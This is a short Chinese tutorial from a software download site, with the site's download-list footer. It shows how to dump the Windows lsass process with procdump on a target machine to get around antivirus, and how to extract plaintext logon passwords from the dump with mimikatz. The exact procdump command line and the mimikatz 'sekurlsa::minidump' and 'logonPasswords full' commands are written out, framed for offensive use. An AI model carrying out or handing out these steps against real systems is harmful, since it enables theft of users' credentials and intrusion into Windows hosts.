众所周知mimikatz可以直接抓到存放在lsass进程中的明文密码,但是很多情况下有杀软这种瘟神挡道,我们必须另想办法。
procdump是微软官方提供的一个小工具,在微软官方有下载
将工具拷贝到目标机器上执行如下命令(需要管理员权限)
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
获得一个lsass进程的内存dump文件lsass.dmp,下面我就们就要用mimikatz(注意是alpha版的mimikatz,否则没有这个命令可用)获得dump文件的明文密码了。
但要注意dump文件和mimikatz的版本对应关系,对应关系如图:
将这个内存dump文件拷贝到mimikatz同目录下,双击打开mimikatz执行情况如图:
mimikatz # sekurlsa::minidump lsass.dmp Switch to MINIDUMP mimikatz # sekurlsa::logonPasswords full
大功告成,菜鸟言论,仅供娱乐。
文件管理软件第七下载提供文件管理软件下载,随着互联网的普及、信息流通的速度、强度和便捷度的加强,一方面人们享受到了前所未有的方便和迅捷,但另一方面也承受着信息爆炸所带来的压力。对于企业而言,信息化让电子文档、纸质...
Mimikatz Win7 2.1.1 最新版 网络辅助 / 826 KB
Mimikatz Win10 2.1.1 最新版 网络辅助 / 826 KB
SecureCRT 8永久免费版 8.0.3 网络辅助 / 454 KB
MikroTik RouterOS jb脚本生成器 2.8 网络辅助 / 6.75 MB
ROS软路由免费版 6.42.4 中文版 网络辅助 / 50.12 MB
Copyright © 2013-2022 m.vector-spaces.com. All Rights Reserved .
第七下载是一个免费软件下载站,提供绿色免费PC软件,手机软件,游戏下载,是国内最安全的下载网站!
Processed in 0.040144(s), 16 queries 鄂ICP备2022009112号-2 
鄂公网安备 42011102000582号
软件评论
请自觉遵守互联网相关政策法规,评论内容只代表网友观点,与本站立场无关!